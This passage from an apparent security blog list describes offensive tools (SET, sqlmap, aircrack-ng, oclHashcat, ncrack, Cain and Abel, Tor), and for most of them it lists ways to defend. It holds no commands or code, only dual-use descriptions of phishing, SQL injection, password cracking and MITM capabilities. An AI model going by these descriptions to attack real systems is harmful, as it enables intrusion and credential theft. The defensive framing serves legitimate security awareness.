5. Social Engineer Toolkit – makes creating a social-engineered client-side attack way too easy. It creates the spear phish, sends the email and serves the malicious exploit. SET is the open source client-side attack weapon of choice.

Defending against SET:

  • User awareness training around spear phishing attacks.
  • Strong Email and Web filtering controls.

6. sqlmap – SQL injection is an attack vector that has been around for over 10 years, yet it is still the easiest way to get dumps of entire databases of information. sqlmap is not only a highly accurate tool for detecting SQL injection; it also has the capability to dump information from the database and even to launch attacks that can result in operating system shell access on the vulnerable system.

Defending against sqlmap:

  • Filter all input on dynamic websites (secure the web applications).
  • Use mod_proxy or other web-based filtering controls to help block malicious injection attacks (not ideal, as attackers are often able to bypass these web application firewalls (WAFs)).

7. aircrack-ng – breaking holes in wireless networks for fun and profit. A suite of tools that enables all manner of wireless network attacks.

Defending against aircrack-ng:

  • Never use WEP.
  • When using WPA2 with pre-shared keys, ensure passwords are strong (10+ characters non-dictionary based passwords).

8. oclHashcat – need to get some passwords from the hashes you grabbed with sqlmap? Use this tool to bust them open. Over 48 different hashing algorithms are supported. It will use the GPU (if supported) on your graphics card to crack those hashes many times faster than your clunky old CPU.

Defending against oclHashcat:

  • Passwords are the weakest link. Enforce password complexity.
  • Protect the hashed passwords.
  • Salt the hashes.

9. ncrack – brute force network passwords with this tool from Fyodor, the creator of Nmap. Passwords are the weakest link, and Ncrack makes it easy to brute force passwords for RDP, SSH, HTTP(S), SMB, POP3(S), VNC, FTP, and telnet.

Defending against ncrack:

  • Use strong passwords everywhere.
  • Implement time based lockouts on network service password failures.

10. Cain and Abel – cracking passwords, sniffing VoIP and man-in-the-middle (MITM) attacks against RDP are just a few examples of the many features of this Windows-only tool.

Defending against Cain and Abel:

  • Be aware of the possibility of MITM attacks (arp attacks, untrusted proxy / gateway, wireless).
  • Use strong passwords everywhere.

11. Tor – push your traffic through this onion network, which is designed to provide anonymity to the user. Note that your traffic from the exit node is not encrypted or secured. Make sure you understand what it does before using it: Tor provides anonymity, not encrypted communication.